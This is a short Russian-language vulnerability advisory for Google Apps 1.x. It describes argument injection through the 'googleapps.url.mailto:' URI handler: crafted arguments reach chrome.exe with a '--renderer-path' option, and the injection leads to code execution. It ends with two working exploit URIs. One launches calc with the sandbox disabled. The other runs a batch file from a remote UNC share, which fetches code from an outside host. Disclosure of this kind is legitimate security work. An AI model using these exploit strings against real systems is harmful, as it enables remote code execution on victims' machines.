Программа: Google Apps 1.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в
googleapps.exe при обработке аргументов, полученных через "googleapps.url.mailto:"
URI. Атакующий может передать специально сформированные аргументы в chrome.exe и
указать опцию "--renderer-path", что позволит выполнить произвольные приложения
на целевой системе.
Эксплоит:
googleapps.url.mailto://"%20--domain="--what%20--renderer-path=calc%20--no-sandbox%20--x"/
googleapps.url.mailto://"%20--domain="--x%20--renderer-path=\\192.168.0.1\uncshare\sh.bat%20--no-sandbox%20--x"/
